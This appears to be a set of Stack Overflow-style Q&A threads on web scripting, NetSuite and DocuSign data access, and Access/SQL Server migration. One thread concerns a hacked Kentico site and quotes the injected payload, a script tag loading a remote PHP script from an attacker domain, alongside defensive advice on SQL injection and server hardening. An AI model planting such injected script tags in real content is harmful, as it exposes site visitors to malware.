What is the difference between client side scripting and server side scripting?
I know that that with server scripting a link will create a dynamic page based on a number of conditions usually within PHP. I also know that with client side scripting all the code is already on the users browser and that the page will alter based on the user's input.
Is there any other tidbits of knowledge on this that anyone can offer me?
Client side scripts can be manipulated by the user, you do not have access to a databases, it may cause different results in different clients... There are a lot of differences. Do you have any specific questions?
Related
I'm in the fact finding stage of an integration project to update DocuSign vendor agreements with status flags in our DB2 construction management software.
I'm a SQL developer that was handed this task, and I know nothing about DocuSign schemas or its APIs.
Has anyone done anything like this before?
A good place to start is the DocuSign quickstart.
While you may use DB2 for your database, you will still need to run some code on the server in some for of server language like C#, Java etc. You can pick one of 8 languages in the quickstart, see how the APIs work, what data you need and how you may design your system accordingly.
I'm not sure if this is the right place to ask this question. If not, please direct me to the right place.
We used to have an application that was created using VB and Microsoft Access. It was an application to score calls from Agents and would then run a few calculations and grade those agents based on a few algorithms.
We replicated all that Access data onto SQL but for some reason, we were just not able to connect the VB application to the SQL Database instead. The application was also outdated and we needed a change.
Can anyone suggest software/framework that can be used to create a new application with an ability to connect to a SQL database?
EDIT: We have a Microsoft Office 365 subscription. I was thinking of using PowerApps. I've never used it before. Does anyone think this could help serve my purpose?
I have extensive experience of using PowerApps to create applications connected to SQL Server (in my case Azure SQL Database), and am mostly satisfied.
There are some constraints, but not major. Please see these posts for some further information.
I would suggest PowerApps if you have Office365.
A company uses netsuites to make purchase orders and store sales information. The only way this company is able to access this information at the moment is through building netsuites reports
Is there a way SQL language could be written to access the netsuites data as some of the questions asked by the business need something a bit more complex than what netsuites reporting provides - and sound very easy using SQL language
I have experience in Oracle, mysql, and many other SQL languages so I would like to know how to set up a connection to the companies netsuites data so I can help write custom queries
Netsuite has SuiteAnalytics Connect, which is ODBC. It can be downloaded from a link at the very bottom the home screen of your Netsuite account.
After installation of the application bundle and connecting it to your Netsuite, you can write ORACLE SQL queries via Excel, Access, etc. My experience is that Netsuite uses Oracle SQL in ODBC queries and in Saved Search custom queries.
The way I understand it, the ODBC driver is a separately priced item from NetSuite. Once you have that, you could use Excel, Access, Crystal Reports or anything else that can use the ODBC driver to read the data and write queries against it.
The normal way to access NetSuite data is with SuiteScript -- javascript code that uses the nlapi* calls to get to the data.
You can access Netsuite backend using a number of different tools and it allows running Oracle SQL directly.
Netsuite provides JDBC, ADO.NET and ODBC if it was included in your licensing purchase. You can find the downloads from the main menu - lower left hand of the screen in Settings - Set Up SuiteAnalytics Connect.
ADO.net however is pretty worthless in SSIS as it doesn't allow parameter mapping or SQL from a variable value. I have yet to get the ODBC driver to work correctly - it can connect and show columns of a table but it won't validate saying "The ODBC Source.Outputs[ODBC Source Error Output].Columns[...] on the error output has properties that do not match the properties of its corresponding data source column."
The other options I'm looking into are Cozyroc and Kinsgwaysoft adapters for Netsuite. You could also do SOAP or REST connections if desired.
I've not used this, but there should as of 2014.2 there is an ODBC driver available for read access.
http://www.netsuite.com/portal/landing/2014-2/suiteanalytics.shtml
As previously mentioned, if you have it licensed you can download the ODBC driver from the Netsuite application. I tested some other adapters but found Netsuite's at least as good as the competitors and they provide timely security updates to the drivers as well as both 64 and 32 bit versions.
There are also metadata browsers that are on the net (example is URL below), the type of browser being based on which kind of access you are looking at (web services, verses ODBC, etc).
https://system.sandbox.netsuite.com/help/helpcenter/en_US/srbrowser/Browser2017_2/odbc/record/account.html
Within the application GUI there is information you need to connect using their ODBC connection (you need the account id and the role id). The URL is just odbcserver.xxxx.netsuite.com where xxx is specific to your environment you are accessing. Note that other adapters such as Cozyroc, etc. require the admin to setup connections in Netsuite for those.
Here is a list of the main metadata tables:
OA_FKEYS
OA_TABLES
OA_COLUMNS
In addition, note that the URL above does NOT include customization. Plus its not easily consumed by automation tools. But Netsuite provides a set of metadata views within the repository which you can use ODBC to pull from which includes all keys - foreign and primary. AND it does include customizations! I built simple set of ETL jobs that use standard ADO.NET driver within SSIS and the ODBC DSN to pull all the metadata and then use BIML to automatically generate all the extract ETL and related staging tables. You can also easily then use the metadata to detect changes in the underlying database.
Let me know if I can be any help with doing any of this.
There are 3rd party tools, like CData ODBC Adapter for NetSuite: http://www.cdata.com/drivers/netsuite/odbc/ . This tool allows you to run standard SQL against the NetSuite API. Note that the NetSuite API presents a very different data model from that of the native NetSuite ODBC.
With this tool, you install in onto your machine (Win in my case) and then after you configure the driver, you can run SQL against it (the driver config is where you specify your NS credentials, etc.).
It revolutionizes access to NetSuite data IMHO.
Download the Netsuite ODBC drivers, set up your DSN locally with server/credentials, Use SSIS pkgs to automate data extract and load onto you local DB. Use ADO.NET drivers if preferred. Then utilize those tables to create/deliver your complex reports using SQL (stored procedures) and Reporting Services. This will require SQL Standard license at minimum though.
Only API call can access the NetSuite data
You can't access to Netsuite data using sql language.
The only way to gain access to Netsuite from third party systems is to use SOAP request or PHP toolkit.
I am using ADO to connect to an access database from an excel spreadsheet using code written in vb. The spreadsheet allows someone to retrieve files stored locally on my machine according to what they enter in certain cells and from interrogating the database. This has worked well which presents the frightening prospect of me now feeling encouraged!...
It is my wish to give a copy of my spreadsheet to people but retain the files and database on my own computer or a dedicated server. ( I do not want the users to be able to access anything other than a view onto the data or the files that I allow them to access). I totally appreciate their are a myriad of alternative technologies that I could and might need to achieve this. But I really am quite a simpleton and would like to be able to simply amend my connection string with something that uses an IP address and similarly with the files. Is this even possible? Can someone advise me where to even start looking for a solution if it is not? I've browsed through stuff on VPN's, application servers, ASP's etc. without even knowing if it is relevant and, as I say, I need the dumbsters solution. I'm happy to read - but what......should I look at VB.net?
A VPN would allow a similar setup to what you have now in as much as your would need to modify the connection string and file paths (to network share paths) but has drawbacks:
Users/you would need to configure a VPN client
Your machine would be the host so would need to be always-on with sufficient bandwidth
Users would be logging on to your machine so you would need to manage access rights/security
This is difficult to scale and a pain in to manage, which is something that is also true of attempting to serve Access content over the internet.
A more standard way to do this would be to:
Get an ASP.NET hosting account with SQL Server support (or set this up on your machine)
Migrate the Access data to SQL Server (which unlike Access is specifically designed to support multiple users over a network)
Update your VBA connection string and make any required changes to your SQL
Create an ASP page that reads the files stored on the server and returns their content
Modify the code you have that loads files from disk to instead query this ASP page over HTTP and read its contents
Retaining Access; you could also create a ASP page that executes queries, reads the data and converts it to XML returned to your spreadsheet for processing.
My site is created in Kentico CMS 5.5 and SQL server 2008. Its running successfully but now these days any one of hacker hack my site and after a long time i found that in many of tables hacker add
></title><script src="http://lilupophilupop.com/sl.php"></script><!--
line in before of ever varchar cell. Suppose i have user table in that case before username it adds this string, before user's email-ID it adds this same string. How i can prevent my sql server by using this hacking. And what is the reason behind this?
How i can prevent my sql server by using this hacking.
First, you need to find out how the hacker got the data into your database (SQL injection, weak account password, ...). Then you can take appropriate actions.
And what is the reason behind this?
The hacker hopes that the varchar field is printed on a web page without being properly encoded first. If that happens, the user's browser will download and execute the script.
This looks like it could be an 'SQL Injection' attack probably aimed at sending your visitors to a malware of fraudlent site.
Unfortunatly as Kentico CMS is commercial software your options are limited. You won't have the source that you can tweak to prevent further attacks commint through the front end.
You may need to
Review the security of your SQL server and ensure that the attacker didn't connect to it directly
Update to the latest security patch for the CMS (if you pay for maintenance it's free)
Get support from Kentico, they may have seen this before
Clean up your data and remove the offending scripts
If none of that is sucessful you may be able to add triggers to the necessary tables in SQL to remove the scripts as they are inserted in the database.
You need to follow the industry best practices : look at
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
For the top 10 Web application security risks.
There are few things to keep in mind that save your database from hacking is given below:
Always use parametrized Sql, pass all values to DB using parametrized query
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = #ID");
Not
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = " + value + "");
Similarly, use INSERT, UPDATE, and DELETE query, or use STORED PROCEDURE in same manner.
Only set permission to your specific user
You can on/off ValidateRequest in your page/web.config file as required.
Set Validation both in client/server side so that only valid data will pass to DB
User appropriate data type in your column other than using a common data type (say VARCHAR)
Thanks
I agree with #Heinzi - you should make an effort to figure out the attack vector (how the baddie got into your application). You've found text in your database, but how did it get there? Directly via Sql Server or through the web server OR through Kentico? As you go through this investigative process, make notes of where your security is weak, and firm it up as you go - you're essentially doing a security audit! Doing these steps will lead you to harden your servers against most sort of attacks, hopefully preventing this sort of thing from happening to you again.
I don't know anything about your topology (how your servers are set up and connected to each other and the web), but we can make a start at investigating by looking into the windows log of the machine your sql server is installed on - look for logins happening at times that are questionable, look for odd user accounts, and examine your password and username security. Get more details of things to look into here:Windows Intruder Detection Checklist
If that doesn't turn up anything, look at the Sql server logs, and review your username/password security AND the access to the sql server instance; eg: the sql server should only be accessible from machines that have an explicit reason - your web server, maybe a network admin box, etc - use Windows Firewall to make the access 'tight', so that the sql server instance doesn't just respond to any computer asking. - Here's more details about how to secure sql server.
Check the web.config on your webserver - is the sql server username and password there? Check your ftp logs to see if anyone's tried to read it recently.
Kentico versions 5+ (and maybe earlier) come with the ability to log 'events'. If you have event logging turned on, you should be able to see your templates being modified; go to Site Manager > Administration > Event Log and go back to the date when you first noticed it, and examine the entries for what user account was doing the modifications.
Or even better: if you have access to the db server, you can do a direct table query to get at this data:
SELECT TOP 1000 *
FROM [CMS_EventLog] Look again for entries that seem to happen at odd times from weird Ip addresses or usernames.
And again, it's better to restrict access to all 'sensitive' resources (the Database, Kentico cmsdesk and siteadmin) as best you can. Windows Firewall is pretty great at doing this - tighten down Remote Desktop access, and close as many ports as you can to reduce your servers' exposed surface area. Test your exposure using something as simple as Shields Up! from Gibson Research or the Awesome Nmap security scanner tool.
As an example, my web servers only publicly expose ports 80 and 443 (http and https), and maybe a random high port like 4456 for Ftp if it's needed. I use Windows Firewall to restrict access to Remote Desktop to a handful of IP addresses. The Sql servers have NO public ports, they are tuned to 'stealth' and not reply to any request from a non-authorized IP.
As an anecdotal example - when I put a server live, it has taken as little as 8 hours before bots start trying to log in via remote desktop (you can see thousands of failed attempts in the windows Event Log > security) - as soon as you use windows firewall to ignore non-approved IP addresses, the log stays clear.
As a helpful note: if you are not experienced doing this sort of thing, you may want to procure the services of an experienced Windows system administrator to help you. And please realize that there may be more compromised systems - you may have just found the 'tip of the iceberg', there could be Trojans and Rootkits and other nasties waiting, so you'll need a full security scan too.